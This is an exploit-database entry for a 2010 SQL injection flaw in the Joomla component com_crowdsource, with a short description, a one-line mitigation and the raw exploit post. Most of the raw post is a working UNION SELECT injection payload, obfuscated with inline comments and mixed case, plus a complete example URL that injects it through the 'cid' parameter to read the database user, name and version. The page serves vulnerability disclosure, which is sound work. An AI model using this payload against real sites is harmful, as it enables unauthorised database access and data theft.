header-logo
Suggest Exploit
vendor:
Joomla
by:
ByEge
7.5
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Joomla
Affected Version From:
Affected Version To:
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2010

Joomla Component com_crowdsource SQL Injection

The Joomla Component com_crowdsource is vulnerable to SQL Injection. An attacker can exploit this vulnerability to execute arbitrary SQL commands on the underlying database.

Mitigation:

Update to the latest version of Joomla and apply any available patches.
Source

Exploit-DB raw data:

[!] Title: Joomla Component com_crowdsource   SQL Injection 

[!] Date: 16.05.2010
    
[!] Author: ByEge

[!] Homepage: byege.blogspot.com

[+]########################################################################################################################################################[+]


[!]  ExploiT     :

-3/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--

[!]  Example     :

http://localhost.free/index.php?option=com_crowdsource&view=design&cid=-3/**/uNIOn/**/sELECt/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(char(32,58,32),user(),database(),version()),18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37/**/--


[+]########################################################################################################################################################[+]

[!]  Th4nks :  Fantastik, MitolocyA, ISYAN,